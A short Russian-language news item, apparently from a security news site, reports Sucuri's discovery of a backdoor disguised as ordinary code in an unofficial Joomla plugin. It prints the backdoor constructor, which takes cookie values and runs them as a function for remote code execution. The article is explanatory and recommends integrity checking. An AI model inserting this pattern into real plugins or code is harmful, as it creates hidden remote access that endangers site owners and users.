В плагине Joomla обнаружили бэкдор, замаскированный под легитимный код

В плагине Joomla обнаружили бэкдор, замаскированный под легитимный код

По данным экспертов, упустить наличие бреши могут как администраторы, так и решения безопасности.

Как сообщают исследователи безопасности в официальном блоге компании Sucuri, им удалось выявить «интересный бэкдор» в неофициальном плагине для платформы Joomla.

По словам специалистов, все было настолько хорошо продумано, что поначалу они не смогли понять, что имеют дело с бэкдором. Для наглядности эксперты предоставили код упомянутого дополнения:

«На первый взгляд ничего подозрительного. Ничего не зашифровано, не запутано и нет излишних комментариев. Самый обычный код для плагина Joomla, - отмечают в Sucuri. – Однако если вы посмотрите немного внимательней, то заметите, что конструктор класса не так уж и безобиден».

public function __construct() {
  $filter = JRequest::getString('p3', Null, 'cookie');
  if ($filter) {
  $option = $filter(JRequest::getString('p2', Null, 'cookie'));
  $auth = $filter(JRequest::getString('p1', Null, 'cookie'));
  $option("/123/e",$auth,123);
  die();
  }
  }

Исследователи подчеркивают, что не заметить уязвимость при просмотре кода довольно легко. Более того, упустить ее могут и многие сканеры безопасности, однако надежным методом противостояния подобным угрозам является использование инструментов по контролю целостности кода.

Ознакомиться с отчетом можно  здесь .

Наш канал защищен лучше, чем ваш компьютер!

Но доступ к знаниям открыт для всех

Получите root-права на безопасность — подпишитесь